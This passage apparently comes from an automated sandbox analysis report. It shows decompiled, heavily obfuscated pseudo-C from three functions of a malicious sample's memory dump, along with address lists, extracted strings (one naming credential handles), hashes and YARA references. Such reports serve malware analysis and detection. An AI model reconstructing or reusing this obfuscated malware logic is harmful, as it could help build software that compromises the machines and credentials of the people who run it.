				_v552 = _v552 + 0xffff498d;
				_v552 = _v552 ^ 0x9d0763b6;
				_v564 = 0xe384;
				_v564 = _v564 ^ 0xde12aa62;
				_v564 = _v564 | 0x2c019ae9;
				_v564 = _v564 ^ 0xa4e5f9a5;
				_v564 = _v564 ^ 0x5af67a61;
				_v576 = 0x7d9f;
				_v576 = _v576 + 0x6134;
				_v576 = _v576 | 0x6ccc595a;
				_v576 = _v576 ^ 0x0058e7ee;
				_v576 = _v576 ^ 0x6c9448a2;
				_v592 = 0x396f;
				_v592 = _v592 * 7;
				_v592 = _v592 ^ 0x10cc7cbf;
				_v592 = _v592 ^ 0x10cdfb96;
				_v560 = 0x3078;
				_v560 = _v560 << 8;
				_t244 = _v588;
				_v560 = _v560 / _t243;
				_v560 = _v560 + 0xffff6a19;
				_v560 = _v560 ^ 0x000f142e;
				goto L1;
				do {
					while(1) {
						L1:
						_t249 = _t214 - 0x3227b83a;
						if(_t249 > 0) {
							break;
						}
						if(_t249 == 0) {
							_v584 = 0xc457;
							_v584 = _v584 >> 6;
							_t165 =  &_v584;
							 *_t165 = _v584 ^ 0x0000030d;
							__eflags =  *_t165;
							_t202 =  *0x22ca2c; // 0x558300
							 *((intOrPtr*)(_t202 + 0x218)) = E00227CC2;
							L13:
							_t214 = 0x2ded9275;
							continue;
						}
						if(_t214 == 0xf501058) {
							_push(_t214);
							_push(_t214);
							_t206 = E00218736(0x454);
							 *0x22ca2c = _t206;
							__eflags = _t206;
							if(_t206 == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t206 + 0x214)) = E002220C5;
							_t214 = 0x382146c2;
							continue;
						}
						if(_t214 == 0x204dd1d9) {
							E0021B112();
							_t214 = 0x354eaa90;
							continue;
						}
						if(_t214 == 0x24baa30b) {
							_v584 = 0xe62c;
							_t214 = 0x36e33d60;
							_v584 = _v584 ^ 0x84d80cbd;
							_v584 = _v584 ^ 0x84d8eab8;
							continue;
						}
						if(_t214 != 0x2ded9275) {
							goto L22;
						}
						_push(_t214);
						_push(_t214);
						E0021C6C7(_v536, _v572,  *0x22ca2c, _t214, _v528, _v584, _v544); // executed
						_t247 =  &(_t247[7]);
						_t214 = 0x204dd1d9;
						_t210 = 1;
						_t245 =  ==  ? _t210 : _t245;
					}
					__eflags = _t214 - 0x354eaa90;
					if(__eflags == 0) {
						E00223E3F(_t214,  &_v520, __eflags, _v552, _v564);
						_t200 = E0021E29C(_v576, _v592,  &_v520);
						_t216 =  *0x22ca2c; // 0x558300
						_t247 =  &(_t247[3]);
						 *((intOrPtr*)(_t216 + 0x438)) = _t200;
						_t214 = 0xae4e76a;
						goto L22;
					}
					__eflags = _t214 - 0x36e33d60;
					if(_t214 == 0x36e33d60) {
						E00215FB2(_v540, _v556, _t244);
						goto L13;
					}
					__eflags = _t214 - 0x382146c2;
					if(_t214 != 0x382146c2) {
						goto L22;
					}
					_t211 = E00212959(_t214, _v548, _v588, _v580, _v560); // executed
					_t244 = _t211;
					_t247 =  &(_t247[4]);
					__eflags = _t244;
					if(_t244 == 0) {
						_t214 = 0x3227b83a;
					} else {
						_t212 =  *0x22ca2c; // 0x558300
						 *((intOrPtr*)(_t212 + 0x224)) = 1;
						_t214 = 0x24baa30b;
					}
					goto L1;
					L22:
					__eflags = _t214 - 0xae4e76a;
				} while (_t214 != 0xae4e76a);
				L23:
				return _t245;
			}

0x00224b41
0x00224b47
0x00224b50
0x00224b54
0x00224b59
0x00224b5d
0x00224b64
0x00224b75
0x00224b79
0x00224b7b
0x00224b83
0x00224b91
0x00224b96
0x00224ba1
0x00224ba4
0x00224ba8
0x00224bad
0x00224bb5
0x00224bbd
0x00224bc2
0x00224bca
0x00224bd2
0x00224bda
0x00224be2
0x00224bea
0x00224bef
0x00224bf4
0x00224bfc
0x00224c04
0x00224c0c
0x00224c14
0x00224c1c
0x00224c2c
0x00224c30
0x00224c35
0x00224c3d
0x00224c45
0x00224c4d
0x00224c55
0x00224c5d
0x00224c6a
0x00224c6d
0x00224c71
0x00224c79
0x00224c81
0x00224c89
0x00224c91
0x00224c99
0x00224ca6
0x00224cb2
0x00224cb6
0x00224cbb
0x00224cc3
0x00224ccf
0x00224cd2
0x00224cd6
0x00224cde
0x00224ce6
0x00224cf7
0x00224d02
0x00224d06
0x00224d0e
0x00224d16
0x00224d1e
0x00224d26
0x00224d2e
0x00224d36
0x00224d3e
0x00224d46
0x00224d4e
0x00224d56
0x00224d5e
0x00224d66
0x00224d6e
0x00224d76
0x00224d7e
0x00224d8b
0x00224d8f
0x00224d97
0x00224d9f
0x00224da7
0x00224db2
0x00224db6
0x00224dba
0x00224dc2
0x00224dc2
0x00224dca
0x00224dca
0x00224dca
0x00224dca
0x00224dcc
0x00000000
0x00000000
0x00224dd2
0x00224e98
0x00224ea0
0x00224ea5
0x00224ea5
0x00224ea5
0x00224ead
0x00224eb2
0x00224ebc
0x00224ebc
0x00000000
0x00224ebc
0x00224dde
0x00224e69
0x00224e6a
0x00224e70
0x00224e75
0x00224e7c
0x00224e7e
0x00000000
0x00000000
0x00224e84
0x00224e8e
0x00000000
0x00224e8e
0x00224de6
0x00224e4e
0x00224e53
0x00000000
0x00224e53
0x00224dee
0x00224e2c
0x00224e34
0x00224e39
0x00224e41
0x00000000
0x00224e41
0x00224df2
0x00000000
0x00000000
0x00224df8
0x00224df9
0x00224e15
0x00224e1a
0x00224e1d
0x00224e26
0x00224e27
0x00224e27
0x00224ec3
0x00224ec9
0x00224f39
0x00224f4b
0x00224f50
0x00224f56
0x00224f59
0x00224f5f
0x00000000
0x00224f5f
0x00224ecb
0x00224ed1
0x00224f25
0x00000000
0x00224f2a
0x00224ed3
0x00224ed9
0x00000000
0x00000000
0x00224eef
0x00224ef4
0x00224ef6
0x00224ef9
0x00224efb
0x00224f15
0x00224efd
0x00224efd
0x00224f05
0x00224f0b
0x00224f0b
0x00000000
0x00224f64
0x00224f64
0x00224f64
0x00224f71
0x00224f7c

Strings

Q, xrefs: 00224BB5
x0, xrefs: 00224D9F
8b, xrefs: 00224BF4
j, xrefs: 00224F64
`=6, xrefs: 00224E34
X, xrefs: 00224D6E
j, xrefs: 00224F5F
`=6, xrefs: 00224ECB
o9, xrefs: 00224D7E
!yG, xrefs: 00224C79
,, xrefs: 00224E2C
, xrefs: 00224CBB

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: !yG$,$8b$Q$`=6$`=6$j$j$o9$x0$ $X
API String ID: 0-3958274775
Opcode ID: fdaa8feb60b1bed44b7a376fda33fca06441bfb449bda959987df7b34a78ae68
Instruction ID: 092f66497e1240aceea93184ae0b8bd9501b045ac0f54ec1bf289051687b5e7e
Opcode Fuzzy Hash: fdaa8feb60b1bed44b7a376fda33fca06441bfb449bda959987df7b34a78ae68
Instruction Fuzzy Hash: 03A17871118381AFD358DFA4D58A42BFBE1FBC4358F204A1DF596962A0C3B88A59CF47

Uniqueness

Uniqueness Score: -1.00%

Function 00223895, Relevance: 14.0, Strings: 11, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00223895() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _t281;
				intOrPtr _t284;
				void* _t286;
				void* _t290;
				void* _t294;
				void* _t295;
				char _t297;
				void* _t303;
				intOrPtr _t321;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int* _t331;

				_t331 =  &_v700;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t295 = 0x16120aa4;
				_v536 = 0x65127b;
				_v664 = 0x3b49;
				_v664 = _v664 << 5;
				_v664 = _v664 + 0x6a36;
				_v664 = _v664 >> 7;
				_v664 = _v664 ^ 0x00000fa7;
				_v616 = 0x772f;
				_v616 = _v616 ^ 0x73b15b69;
				_v616 = _v616 ^ 0x73b12d46;
				_v604 = 0xe6c8;
				_v604 = _v604 + 0x8155;
				_v604 = _v604 ^ 0x000105e4;
				_v700 = 0xa5d;
				_v700 = _v700 * 0x52;
				_t294 = 0;
				_v700 = _v700 + 0xffffecf8;
				_t325 = 0x58;
				_v700 = _v700 * 0x66;
				_v700 = _v700 ^ 0x014b32de;
				_v684 = 0xc8e0;
				_v684 = _v684 + 0x308b;
				_v684 = _v684 + 0x2664;
				_v684 = _v684 >> 6;
				_v684 = _v684 ^ 0x00006abe;
				_v676 = 0x796a;
				_v676 = _v676 + 0xffff196c;
				_v676 = _v676 + 0xffffd40e;
				_v676 = _v676 ^ 0xd773f48b;
				_v676 = _v676 ^ 0x288ceae9;
				_v612 = 0x157c;
				_v612 = _v612 << 0x10;
				_v612 = _v612 ^ 0x157c11c9;
				_v652 = 0xe7a2;
				_v652 = _v652 / _t325;
				_v652 = _v652 | 0x448e2e0d;
				_v652 = _v652 ^ 0x448e7eb8;
				_v640 = 0x3ee9;
				_v640 = _v640 * 0x5d;
				_v640 = _v640 >> 0xd;
				_v640 = _v640 ^ 0x0000282d;
				_v648 = 0xf425;
				_v648 = _v648 * 9;
				_v648 = _v648 >> 1;
				_v648 = _v648 ^ 0x0004354a;
				_v608 = 0x24ee;
				_v608 = _v608 + 0x809c;
				_v608 = _v608 ^ 0x0000fdeb;
				_v636 = 0x6dae;
				_v636 = _v636 + 0x1c44;
				_v636 = _v636 + 0x2b83;
				_v636 = _v636 ^ 0x0000a12d;
				_v656 = 0xe590;
				_v656 = _v656 >> 2;
				_v656 = _v656 << 7;
				_v656 = _v656 ^ 0x001cffcc;
				_v668 = 0xb9db;
				_v668 = _v668 >> 0xd;
				_v668 = _v668 + 0x89dd;
				_v668 = _v668 | 0xbce2fd3c;
				_v668 = _v668 ^ 0xbce2f9c6;
				_v596 = 0x1790;
				_v596 = _v596 + 0xffff27ec;
				_v596 = _v596 ^ 0xffff59a3;
				_v672 = 0xffb9;
				_v672 = _v672 + 0xffff618d;
				_v672 = _v672 >> 2;
				_t326 = 0x31;
				_v672 = _v672 * 0x75;
				_v672 = _v672 ^ 0x000b38e4;
				_v644 = 0xc4de;
				_v644 = _v644 + 0xbfb6;
				_v644 = _v644 ^ 0xc1434f22;
				_v644 = _v644 ^ 0xc142a5f5;
				_v680 = 0x8a5a;
				_v680 = _v680 | 0x8f6cf4f7;
				_v680 = _v680 + 0x838e;
				_v680 = _v680 + 0xffffa8f9;
				_v680 = _v680 ^ 0x8f6d4033;
				_v660 = 0xe8e2;
				_v660 = _v660 / _t326;
				_t327 = 0x25;
				_v660 = _v660 * 0x78;
				_v660 = _v660 ^ 0x000205be;
				_v688 = 0x9cd0;
				_v688 = _v688 + 0x8e7d;
				_v688 = _v688 * 0x26;
				_v688 = _v688 * 0x51;
				_v688 = _v688 ^ 0x0e0ecd55;
				_v620 = 0xe1b5;
				_v620 = _v620 / _t327;
				_v620 = _v620 ^ 0x00005557;
				_v696 = 0x769d;
				_v696 = _v696 >> 7;
				_v696 = _v696 | 0x5538ae99;
				_v696 = _v696 << 2;
				_v696 = _v696 ^ 0x54e2b31f;
				_v600 = 0xdcef;
				_v600 = _v600 << 6;
				_v600 = _v600 ^ 0x003705ca;
				_v624 = 0x48eb;
				_v624 = _v624 >> 0xd;
				_v624 = _v624 ^ 0x00002379;
				_v692 = 0xfa2c;
				_v692 = _v692 | 0x4759ecfd;
				_v692 = _v692 >> 0xc;
				_v692 = _v692 >> 9;
				_v692 = _v692 ^ 0x000062c4;
				_v632 = 0xbcd9;
				_v632 = _v632 << 4;
				_v632 = _v632 | 0x68c1d353;
				_v632 = _v632 ^ 0x68cbf855;
				_v628 = 0x848;
				_t328 = 0x1c;
				_v628 = _v628 / _t328;
				_v628 = _v628 ^ 0x00001dd4;
				_t324 = _v628;
				_v592 = 0xa720;
				_v592 = _v592 + 0xffff9569;
				_v592 = _v592 ^ 0x00003c8a;
				do {
					while(_t295 != 0x2b0230e) {
						if(_t295 == 0x16120aa4) {
							_t295 = 0x182cddf3;
							continue;
						} else {
							if(_t295 == 0x182cddf3) {
								E0022AAAE(_v604, _v700, _v684,  &_v588, _v676);
								_t331 =  &(_t331[3]);
								_t295 = 0x2f4d7b3a;
								continue;
							} else {
								if(_t295 == 0x1c4d16fa) {
									_t284 = _v584;
									_t297 = _v588;
									_v548 = _v548 & 0x00000000;
									_v576 = _t284;
									_v568 = _t284;
									_v560 = _t284;
									_v552 = _t284;
									_v580 = _t297;
									_v572 = _t297;
									_v564 = _t297;
									_v556 = _t297;
									_t286 = E0021B6DD(_t297, _v600, _t297, _t324, _v624,  &_v580, _v692); // executed
									_t331 =  &(_t331[5]);
									__eflags = _t286;
									_t294 =  !=  ? 1 : _t294;
									_t295 = 0x2a39a402;
									continue;
								} else {
									if(_t295 == 0x2a39a402) {
										E00224F7D(_v632, _v628, _t324);
									} else {
										if(_t295 == 0x2f4d7b3a) {
											_v588 = _v588 - E0021F46D();
											_t295 = 0x369a1b5f;
											asm("sbb [esp+0x84], edx");
											continue;
										} else {
											_t339 = _t295 - 0x369a1b5f;
											if(_t295 != 0x369a1b5f) {
												goto L16;
											} else {
												_push(_v652);
												_t290 = E0022889D(0x22c9b0, _v612, _t339);
												_pop(_t303);
												_t321 =  *0x22ca2c; // 0x558300
												_t224 = _t321 + 0x230; // 0x680053
												E0021C680(_t224, _v648, _v608, _t303, _v636,  *0x22ca2c, _t290,  &_v524);
												_t331 =  &(_t331[7]);
												E00222025(_v656, _t290, _v668, _v596);
												_t295 = 0x2b0230e;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t294;
					}
					_t281 = E0021B566(_t295, _v664, _v672, _v644, _v616, _v680, _t295, _v660, _v688, 0, _v620, _v696, _v592,  &_v524); // executed
					_t324 = _t281;
					_t331 =  &(_t331[0xc]);
					__eflags = _t281 - 0xffffffff;
					if(__eflags == 0) {
						_t295 = 0x1d984ba2;
						goto L16;
					} else {
						_t295 = 0x1c4d16fa;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t295 - 0x1d984ba2;
				} while (__eflags != 0);
				goto L19;
			}

0x00223895
0x0022389b
0x002238a5
0x002238ad
0x002238b2
0x002238bd
0x002238c5
0x002238ca
0x002238d2
0x002238d7
0x002238df
0x002238e7
0x002238ef
0x002238f7
0x002238ff
0x00223907
0x0022390f
0x0022391e
0x00223922
0x00223924
0x00223933
0x00223934
0x00223938
0x00223940
0x00223948
0x00223950
0x00223958
0x0022395d
0x00223965
0x0022396d
0x00223975
0x0022397d
0x00223985
0x0022398d
0x00223995
0x0022399a
0x002239a2
0x002239b0
0x002239b4
0x002239bc
0x002239c4
0x002239d1
0x002239d5
0x002239da
0x002239e2
0x002239ef
0x002239f3
0x002239f7
0x002239ff
0x00223a07
0x00223a0f
0x00223a17
0x00223a1f
0x00223a27
0x00223a2f
0x00223a37
0x00223a3f
0x00223a44
0x00223a49
0x00223a51
0x00223a59
0x00223a5e
0x00223a66
0x00223a6e
0x00223a76
0x00223a7e
0x00223a86
0x00223a8e
0x00223a96
0x00223a9e
0x00223aac
0x00223ab4
0x00223ab8
0x00223ac0
0x00223ac8
0x00223ad0
0x00223ad8
0x00223ae0
0x00223ae8
0x00223af0
0x00223af8
0x00223b00
0x00223b08
0x00223b18
0x00223b21
0x00223b24
0x00223b28
0x00223b30
0x00223b38
0x00223b45
0x00223b4e
0x00223b52
0x00223b5a
0x00223b6a
0x00223b6e
0x00223b76
0x00223b7e
0x00223b83
0x00223b8b
0x00223b90
0x00223b98
0x00223ba0
0x00223ba5
0x00223bad
0x00223bb5
0x00223bba
0x00223bc2
0x00223bca
0x00223bd2
0x00223bd7
0x00223bdc
0x00223be4
0x00223bec
0x00223bf1
0x00223bf9
0x00223c01
0x00223c0d
0x00223c10
0x00223c14
0x00223c1c
0x00223c20
0x00223c28
0x00223c30
0x00223c38
0x00223c38
0x00223c4a
0x00223db7
0x00000000
0x00223c50
0x00223c52
0x00223da5
0x00223daa
0x00223dad
0x00000000
0x00223c58
0x00223c5e
0x00223d0c
0x00223d17
0x00223d1e
0x00223d26
0x00223d2d
0x00223d34
0x00223d3b
0x00223d57
0x00223d5e
0x00223d65
0x00223d6c
0x00223d73
0x00223d7a
0x00223d7e
0x00223d80
0x00223d83
0x00000000
0x00223c64
0x00223c6a
0x00223e2c
0x00223c70
0x00223c76
0x00223cf4
0x00223cfb
0x00223d00
0x00000000
0x00223c78
0x00223c78
0x00223c7e
0x00000000
0x00223c84
0x00223c84
0x00223c91
0x00223c96
0x00223cb8
0x00223cc2
0x00223cc8
0x00223ccd
0x00223cde
0x00223ce5
0x00000000
0x00223ce5
0x00223c7e
0x00223c76
0x00223c6a
0x00223c5e
0x00223c52
0x00223e35
0x00223e3e
0x00223e3e
0x00223df7
0x00223dfc
0x00223dfe
0x00223e01
0x00223e04
0x00223e10
0x00000000
0x00223e06
0x00223e06
0x00000000
0x00223e06
0x00000000
0x00223e15
0x00223e15
0x00223e15
0x00000000

Strings

6j, xrefs: 002238CA
-(, xrefs: 002239DA
WU, xrefs: 00223B6E
:{M/, xrefs: 00223DAD
:{M/, xrefs: 00223C70
$, xrefs: 002239FF
d&, xrefs: 00223950
ontext returned - (%14) Credential Handle(%2:%3) Context Handle (%4:%5) (OutputFlags %11) (Buffer %8 [%9/%10]) (DataChunk %12 [%13, xrefs: 00223C38, 00223CE5
y#, xrefs: 00223BBA
jy, xrefs: 00223965
/w, xrefs: 002238DF

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: -($/w$6j$:{M/$:{M/$WU$d&$jy$ontext returned - (%14) Credential Handle(%2:%3) Context Handle (%4:%5) (OutputFlags %11) (Buffer %8 [%9/%10]) (DataChunk %12 [%13$y#$$
API String ID: 2962429428-2735796983
Opcode ID: 49ca791c7e1dac5d272bde57086a8ed7a1806a8c24a2897a57834dffd51b77fb
Instruction ID: 8d5b186529edd27f9c66efb4c919b186451ad6245a12681194b815c7195f558f
Opcode Fuzzy Hash: 49ca791c7e1dac5d272bde57086a8ed7a1806a8c24a2897a57834dffd51b77fb
Instruction Fuzzy Hash: 43D110715183819FE368CF61D489A5BFBE1BBC4318F108A1DF1D9862A0D7B98959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002242DA, Relevance: 7.9, Strings: 6, Instructions: 373
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E002242DA(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _t336;
				intOrPtr _t357;
				intOrPtr _t361;
				void* _t365;
				signed int _t368;
				intOrPtr _t379;
				intOrPtr _t380;
				void* _t413;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				intOrPtr* _t428;
				signed int _t431;
				signed int* _t437;
				void* _t439;

				_t380 = __ecx;
				_push(_a16);
				_v148 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t336);
				_v32 = 0x4bc1;
				_t437 =  &(( &_v172)[6]);
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x000002f8;
				_t379 = 0;
				_v168 = 0xbc3a;
				_t431 = 0x3b64c246;
				_v168 = _v168 >> 0xa;
				_t435 = 0;
				_v168 = _v168 << 1;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x0000918a;
				_v96 = 0x296c;
				_v96 = _v96 ^ 0xfe254c59;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x0001a08f;
				_v52 = 0x7e94;
				_v52 = _v52 + 0xffff276a;
				_v52 = _v52 ^ 0xffffb392;
				_v156 = 0x71e;
				_v156 = _v156 << 0xa;
				_v156 = _v156 ^ 0x91e5be42;
				_v156 = _v156 | 0xf592e812;
				_v156 = _v156 ^ 0xf5fb9c3d;
				_v60 = 0xbf5e;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x00001130;
				_v112 = 0x687f;
				_v112 = _v112 | 0xf46ca00f;
				_t421 = 0x35;
				_v112 = _v112 * 0x78;
				_v112 = _v112 ^ 0x930cd2b7;
				_v152 = 0xc857;
				_v152 = _v152 << 5;
				_v152 = _v152 | 0x37c6acdc;
				_v152 = _v152 + 0xffffd100;
				_v152 = _v152 ^ 0x37df0477;
				_v144 = 0xf477;
				_v144 = _v144 >> 2;
				_v144 = _v144 << 5;
				_v144 = _v144 | 0xf3531cc7;
				_v144 = _v144 ^ 0xf357d736;
				_v120 = 0xcb9;
				_v120 = _v120 + 0xe3f9;
				_v120 = _v120 ^ 0x6ced8dd9;
				_v120 = _v120 ^ 0x6ced4b8c;
				_v20 = 0x5e2b;
				_v20 = _v20 + 0xffff1e4f;
				_v20 = _v20 ^ 0xffff4ba5;
				_v124 = 0x4b0e;
				_v124 = _v124 / _t421;
				_t422 = 0x44;
				_v124 = _v124 / _t422;
				_v124 = _v124 ^ 0x00000f50;
				_v92 = 0x1f74;
				_v92 = _v92 + 0xffffb151;
				_v92 = _v92 ^ 0xde981c2c;
				_v92 = _v92 ^ 0x2167c13f;
				_v48 = 0x349e;
				_v48 = _v48 | 0xa536c816;
				_v48 = _v48 ^ 0xa536ef12;
				_v172 = 0xab81;
				_t423 = 0x46;
				_v172 = _v172 * 0x33;
				_v172 = _v172 + 0xffff1acb;
				_v172 = _v172 ^ 0xbb3feb59;
				_v172 = _v172 ^ 0xbb1e804f;
				_v72 = 0x6207;
				_v72 = _v72 + 0xffff8a84;
				_v72 = _v72 ^ 0xffffdea5;
				_v80 = 0xb702;
				_v80 = _v80 * 0x71;
				_v80 = _v80 + 0xffff1180;
				_v80 = _v80 ^ 0x004fd1d8;
				_v40 = 0x81cb;
				_v40 = _v40 * 0x24;
				_v40 = _v40 ^ 0x001275f3;
				_v88 = 0x5eb0;
				_v88 = _v88 >> 3;
				_v88 = _v88 + 0x92b4;
				_v88 = _v88 ^ 0x0000b644;
				_v160 = 0x12e7;
				_v160 = _v160 ^ 0x069a79b3;
				_v160 = _v160 / _t423;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0x04c33b64;
				_v84 = 0xf1f4;
				_v84 = _v84 | 0x342cde3b;
				_t424 = 0x1c;
				_v84 = _v84 / _t424;
				_v84 = _v84 ^ 0x01dd3282;
				_v116 = 0xb146;
				_t425 = 0x4f;
				_v116 = _v116 * 0x6c;
				_v116 = _v116 + 0xbfc7;
				_v116 = _v116 ^ 0x004bdc24;
				_v76 = 0x885c;
				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x00003fd1;
				_v56 = 0xb3ed;
				_v56 = _v56 + 0xffff0d01;
				_v56 = _v56 ^ 0xffffed6a;
				_v108 = 0xc622;
				_v108 = _v108 | 0x10712732;
				_v108 = _v108 ^ 0x74f95923;
				_v108 = _v108 ^ 0x648892da;
				_v128 = 0x5bd2;
				_v128 = _v128 + 0x6edf;
				_v128 = _v128 >> 2;
				_v128 = _v128 ^ 0x00004896;
				_v164 = 0xe1b;
				_v164 = _v164 / _t425;
				_v164 = _v164 + 0xf341;
				_v164 = _v164 >> 0xb;
				_v164 = _v164 ^ 0x00001a6d;
				_v104 = 0x25ae;
				_v104 = _v104 ^ 0xe14689b4;
				_v104 = _v104 ^ 0x501c8677;
				_v104 = _v104 ^ 0xb15a3e2e;
				_v100 = 0xf2b8;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0x7f8b;
				_v100 = _v100 ^ 0x0000c2a8;
				_v64 = 0x78fc;
				_t426 = 0x2a;
				_v64 = _v64 / _t426;
				_v64 = _v64 ^ 0x000003c6;
				_v28 = 0x315;
				_v28 = _v28 | 0x8467cf1c;
				_v28 = _v28 ^ 0x84678c6c;
				_v36 = 0x48e3;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x48e34564;
				_v140 = 0xd9da;
				_v140 = _v140 ^ 0xccfa4b87;
				_v140 = _v140 >> 8;
				_v140 = _v140 + 0xb0ba;
				_v140 = _v140 ^ 0x00cde1b8;
				_v44 = 0xbd19;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x000065c0;
				_v136 = 0xd203;
				_v136 = _v136 | 0x5349dfd2;
				_v136 = _v136 + 0xffffa76d;
				_v136 = _v136 ^ 0xc21cb162;
				_v136 = _v136 ^ 0x91553623;
				_v24 = 0x8da7;
				_v24 = _v24 + 0xffff55dc;
				_v24 = _v24 ^ 0xffffe382;
				_v68 = 0xcfb5;
				_t427 = 0x28;
				_v68 = _v68 / _t427;
				_v68 = _v68 ^ 0x00000530;
				_t428 = _v12;
				_t357 = _v132;
				while(1) {
					L1:
					while(1) {
						_t439 = _t431 - 0x28e290b2;
						if(_t439 > 0) {
							goto L18;
						}
						L3:
						if(_t439 == 0) {
							_t386 = _t379;
							_t365 = E0022A970(_t379, _v112, _v152, _v144,  &_v4, _v120, _t380, _t380, _a12, _v20, _t380, _v124, _t380,  &_v12, _t380, _t380, _v92);
							_t437 =  &(_t437[0xf]);
							if(_t365 == 0) {
								L24:
								_t431 = 0x1c1c4d3a;
								goto L11;
							} else {
								_t368 = E00228C8F(_t386);
								_t431 = 0x30519b83;
								_t357 = _v12 * 0x2c + _t379;
								_v132 = _t357;
								_t428 =  >=  ? _t379 : (_t368 & 0x0000001f) * 0x2c + _t379;
								goto L12;
							}
							L34:
						} else {
							if(_t431 == _t413) {
								E002294DB(_v160, _v84, _t435,  &_v8, _v116, _v136, _v16, _v76);
								_t431 =  !=  ? 0x33392e52 : 0x221cfa57;
								_t357 = E00215FB2(_v56, _v108, _v16);
								_t437 =  &(_t437[8]);
								L29:
								_t380 = _v148;
								_t413 = 0x10c975df;
								goto L30;
							} else {
								if(_t431 == 0x1c1c4d3a) {
									E0021F536(_v100, _v64, _v28, _t435);
									_t431 = 0x205a5796;
									goto L11;
								} else {
									if(_t431 == 0x205a5796) {
										return E0021F536(_v36, _v140, _v44, _t379);
									}
									if(_t431 == 0x221cfa57) {
										_t428 = _t428 + 0x2c;
										asm("sbb esi, esi");
										_t431 = (_t431 & 0x14354e49) + 0x1c1c4d3a;
										continue;
									} else {
										if(_t431 != 0x2413af03) {
											L30:
											if(_t431 != 0x1b07e5ae) {
												_t357 = _v132;
												while(1) {
													_t439 = _t431 - 0x28e290b2;
													if(_t439 > 0) {
														goto L18;
													}
													goto L3;
												}
												goto L18;
											}
										} else {
											_push(_t380);
											_push(_t380);
											_t357 = E00218736(0x20000); // executed
											_t379 = _t357;
											if(_t379 != 0) {
												_t431 = 0x2c9da08a;
												L11:
												_t357 = _v132;
												L12:
												_t380 = _v148;
												goto L1;
											}
										}
									}
								}
							}
						}
						L33:
						return _t357;
						goto L34;
						L18:
						if(_t431 == 0x2c9da08a) {
							_push(_t380);
							_push(_t380);
							_t357 = E00218736(0x2000);
							_t435 = _t357;
							if(_t357 == 0) {
								_t431 = 0x205a5796;
								goto L29;
							} else {
								_t431 = 0x28e290b2;
								goto L11;
							}
						} else {
							if(_t431 == 0x30519b83) {
								_t361 = E0021F65F(_v68, _v72, _v80, _v40,  *_t428, _a12, _v88); // executed
								_t380 = _v148;
								_t437 =  &(_t437[5]);
								_v16 = _t361;
								_t357 = _v132;
								_t413 = 0x10c975df;
								_t431 =  !=  ? 0x10c975df : 0x221cfa57;
								continue;
							} else {
								if(_t431 == 0x33392e52) {
									E00227830(_v128, _t380, _t435, _v164, _v104, _v24);
									_t437 =  &(_t437[4]);
									goto L24;
								} else {
									if(_t431 != 0x3b64c246) {
										goto L30;
									} else {
										_t431 = 0x2413af03;
										continue;
									}
								}
							}
						}
						goto L33;
					}
				}
			}

0x002242da
0x002242e4
0x002242eb
0x002242ef
0x002242f6
0x002242fd
0x00224304
0x00224305
0x00224306
0x0022430b
0x00224316
0x00224319
